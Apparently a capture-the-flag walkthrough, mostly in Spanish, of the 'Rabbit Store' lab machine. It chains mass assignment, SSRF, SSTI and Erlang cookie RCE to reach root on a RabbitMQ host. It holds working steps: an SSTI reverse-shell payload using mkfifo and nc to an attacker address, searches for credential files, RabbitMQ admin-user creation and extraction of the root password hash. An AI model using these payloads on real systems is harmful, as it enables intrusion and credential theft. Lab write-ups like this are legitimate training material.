🐰Rabbit Store (Linux)

Demonstrate your web application testing skills and the basics of Linux to escalate your privileges.

Enumeración de Red

Nmap

Scan general y específico de servicios

sudo nmap -sS --min-rate 5000 -p- --open -n -Pn 10.10.53.118 -oN puertos
nmap -sCV -p22,80,4369,25672 -oN nmap

Resultado nmap

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3f:da:55:0b:b3:a9:3b:09:5f:b1:db:53:5e:0b:ef:e2 (ECDSA)
|_  256 b7:d3:2e:a7:08:91:66:6b:30:d2:0c:f7:90:cf:9a:f4 (ED25519)
80/tcp    open  http    Apache httpd 2.4.52
|_http-title: Did not follow redirect to <http://cloudsite.thm/>
|_http-server-header: Apache/2.4.52 (Ubuntu)
4369/tcp  open  epmd    Erlang Port Mapper Daemon
| epmd-info: 
|   epmd_port: 4369
|   nodes: 
|_    rabbit: 25672
25672/tcp open  unknown
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

cloudsite.thm → /etc/hosts

Erlang Port Mapper Daemon (epmd) used by default on RabbitMQ and CouchDB installations.

Enumeración de Servicio Web - p80

http://cloudsite.thm

ffuf -u <http://cloudsite.thm/FUZZ> -w ~/Hunting/Wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -c

nothing
Login/Register → storage.cloudsite.thm

Análisis de Registration Workflow

Registro de test account → cloudsite.thm/dashboard/inactive

Mensaje en dashboard/inactive

Sorry, this service is only for internal users working within the organization and our clients. If you are one of our clients, please ask the administrator to activate your subscription.

Análisis de Sesión

La sesión contiene un JWT

Cookie: jwt=<jwt>

JWT Auth Bypass?

JWT Decode & Manipulation

Manipulación de valor de parámetro

{
  "alg": "HS256",
  "typ": "JWT"
}
{
  "email": "[email protected]",
  "subscription": "inactive",
  "iat": 1753981539,
  "exp": 1753985139
}

"subscription": "inactive" → "subscription": "active"

(Error: “Invalid Token”)

Explotación: Mass Assignment - API

PoC

Manipulación de registro con parámetro subscription

POST /api/register HTTP/1.1
Host: storage.cloudsite.thm
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Content-Type: application/json
Content-Length: 70
Origin: http://storage.cloudsite.thm
Priority: u=0

{
  "email":"[email protected]",
  "password":"test",
  "subscription": "active"
}

“User registered successfully”

Acceso Nueva Función: File Upload

Análisis de File Upload

Funciones:

"Upload from Localhost"
"Upload from URL"

Upload from Localhost

Success: Image uploaded successfully!
File path: /api/uploads/<string>

Filtro de Nombre y de Extensión

Upload from URL

Levantar server para subir test file

python3 -m http.server

Success.

SSRF vulnerability?

Fuzzing API

Ffuf

ffuf -u <http://storage.cloudsite.thm/api/FUZZ> -w ~/Hunting/Wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -c

Resultado Ffuf

login                   [Status: 405, Size: 36, Words: 4, Lines: 1, Duration: 88ms]
register                [Status: 405, Size: 36, Words: 4, Lines: 1, Duration: 57ms]
docs                    [Status: 403, Size: 27, Words: 2, Lines: 1, Duration: 64ms]
uploads                 [Status: 401, Size: 32, Words: 3, Lines: 1, Duration: 56ms]

/docs - 403 Forbidden

Internal LFI?

Explotación: SSRF a LFI

Upload from URL

{
    "url":"http://127.0.0.1/api/docs/"
}

Contenido de Archivo Descargado: "Access denied"

Explotación: SSRF a Internal Port Scanning

Enumerar puertos con ffuf mediante SSRF

ffuf -u "<http://storage.cloudsite.thm/api/store-url>" \\ -X POST \\ -H "Content-Type: application/json" \\ -H "Cookie: jwt=<jwt>" \\ -d '{"url":"<http://127.0.0.1>:FUZZ"}' \\ -w <(seq 1 65535) \\ -mc all \\ -t 100 \\ -fs 41

Ports:
- 80
- 3000 → Express? (Tecnología usada en la web)
- 8000
- 15672

Explotación: SSRF a LFI II

Upload from URL

{
    "url":"http://127.0.0.1:3000/api/docs/"
}

Contenido /docs

Endpoints Perfectly Completed

POST Requests:
/api/register - For registering user
/api/login - For loggin in the user
/api/upload - For uploading files
/api/store-url - For uploadion files via url
/api/fetch_messeges_from_chatbot - Currently, the chatbot is under development. Once development is complete, it will be used in the future.

GET Requests: 
/api/uploads/filename - To view the uploaded files
/dashboard/inactive - Dashboard for inactive user
/dashboard/active - Dashboard for active user

Note: All requests to this endpoint are sent in JSON format.

Análisis de API Endpoint

GET /api/fetch_messeges_from_chatbot → "GET method not allowed"
POST /api/fetch_messeges_from_chatbot → 500 ERROR

JSON dummy data

{
    "uwu":"uwu"
}

Excessive Data in Response

{
  "error": "username parameter is required"
}

Parámetro username

{
    "username":"admin"
}

Valor reflejado en respuesta

Sorry, admin, our chatbot server is currently under development.

SSTi Test

{
    "username":"{{7*7}}"
}

Respuesta

Sorry, 49, our chatbot server is currently under development.

SSTi Vulnerability

Ejemplo de Código Vulnerable

$output = $template->render("Hi " . $_GET['name']);

Explotando: SSTi a RCE

Establecer listener

nc -lvnp <port>

Reverse Shell SSTi Payload en parámetro username

{
    "username":"{{ config.__class__.__init__.__globals__['os'].system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <ip> <port> >/tmp/f') }}"
}

Intrusión en el Sistema

Shell: azrael

Enumeración Post-Intrusión

Servicio sospechoso

4369/tcp  open  epmd    Erlang Port Mapper Daemon
| epmd-info: 
|   epmd_port: 4369
|   nodes: 
|_    rabbit: 25672

Recurso

4369 - Pentesting Erlang Port Mapper Daemon (epmd) - HackTricksbook.hacktricks.wiki

If you can leak the Authentication cookie you will be able to execute code on the host. Usually, this cookie is located in ~/.erlang.cookie and is generated by erlang at the first start.

Buscando la cookie

cat ~/.erlang.cookie
cat /.erlang.cookie
find / -type f -name erlang.cookie 2>/dev/null

No cookie

find / -name erlang 2>/dev/null

/usr/lib/erlang → No cookie

Recurso

FreeKBwww.freekb.net

The global erlang cookie file is typically in /var/lib/rabbitmq/.erlang.cookie

Cookie leak!

Erlang distribution RCE and a cookie bruteforcerInsinuator.net

Búsqueda de exploit en metasploit

msfconsole
metasploit > search erlang cookie

exploit/multi/misc/erlang_cookie_rce

Escalada de Privilegios

Shell: rabbitmq

Escalada de Privilegios II: RabbitMQ - Schema Definition Export

RabbitMQ Manual

Command Line Tools | RabbitMQwww.rabbitmq.com

rabbitmqctl.8 | RabbitMQwww.rabbitmq.com

Enumerar usuarios disponibles

rabbitmqctl list_users

error: cookie file must be accessible by owner only

Configurar permisos owner only

chmod 400 /var/lib/rabbitmq/.erlang.cookie

rabbitmqctl list_users

Administrator

The password for the root user is the SHA-256 hashed value of the RabbitMQ root user's password. Please don't attempt to crack SHA-256.

Creación de nuevo usuario administrador

Recurso

How do I create or add a user to rabbitmq?Stack Overflow

Crear usuario y configurar permisos

rabbitmqctl add_user uwu uwu
rabbitmqctl set_permissions -p / uwu ".*" ".*" ".*"
rabbitmqctl set_user_tags uwu administrator

Exportación de admin hash

Schema Definition Export and Import | RabbitMQwww.rabbitmq.com

rabbitmqadmin export rabbit.definitions.json -u uwu -p uwu
cat rabbit definitions.json

RabbitMQ Password Cracking

Recurso

Password Cracking · Issue #27 · qkaiser/cottontailGitHub

Formatear el hash de RabbitMQ

echo <base64 rabbitmq hash> | base64 -d | xxd -pr -c128 | perl -pe 's/^(.{8})(.*)/$2:$1/' > hash

Root hash

su root
> <hash>

Compromiso del Sistema

Shell: Root

Última actualización hace 6 meses

hashtagEnumeración de Red

hashtagNmap

hashtagResultado nmap

hashtagEnumeración de Servicio Web - p80

hashtaghttp://cloudsite.thm

hashtagAnálisis de Registration Workflow

hashtagMensaje en dashboard/inactive

hashtagAnálisis de Sesión

hashtagJWT Decode & Manipulation

hashtagExplotación: Mass Assignment - API

hashtagPoC

hashtagAnálisis de File Upload

hashtagFunciones:

hashtagUpload from Localhost

hashtagUpload from URL

hashtagFuzzing API

hashtagFfuf

hashtagResultado Ffuf

hashtagExplotación: SSRF a LFI

hashtagUpload from URL

hashtagExplotación: SSRF a Internal Port Scanning

hashtagExplotación: SSRF a LFI II

hashtagUpload from URL

hashtagContenido /docs

hashtagAnálisis de API Endpoint

hashtagSSTi Test

hashtagEjemplo de Código Vulnerable

hashtagExplotando: SSTi a RCE

hashtagIntrusión en el Sistema

hashtagEnumeración Post-Intrusión

hashtagRecurso

hashtagRecurso

hashtagEscalada de Privilegios: Erlang Cookie RCE

hashtagEscalada de Privilegios

hashtagEscalada de Privilegios II: RabbitMQ - Schema Definition Export

hashtagRabbitMQ Manual

hashtagCreación de nuevo usuario administrador

hashtagRecurso

hashtagExportación de admin hash

hashtagRabbitMQ Password Cracking

hashtagRecurso

hashtagCompromiso del Sistema

Enumeración de Red

Nmap

Resultado nmap

Enumeración de Servicio Web - p80

http://cloudsite.thm

Análisis de Registration Workflow

Mensaje en dashboard/inactive

Análisis de Sesión

JWT Decode & Manipulation

Explotación: Mass Assignment - API

PoC

Análisis de File Upload

Funciones:

Upload from Localhost

Upload from URL

Fuzzing API

Ffuf

Resultado Ffuf

Explotación: SSRF a LFI

Upload from URL

Explotación: SSRF a Internal Port Scanning

Explotación: SSRF a LFI II

Upload from URL

Contenido /docs

Análisis de API Endpoint

SSTi Test

Ejemplo de Código Vulnerable

Explotando: SSTi a RCE

Intrusión en el Sistema

Enumeración Post-Intrusión

Recurso

Recurso

Escalada de Privilegios: Erlang Cookie RCE

Escalada de Privilegios

Escalada de Privilegios II: RabbitMQ - Schema Definition Export

RabbitMQ Manual

Creación de nuevo usuario administrador

Recurso

Exportación de admin hash

RabbitMQ Password Cracking

Recurso

Compromiso del Sistema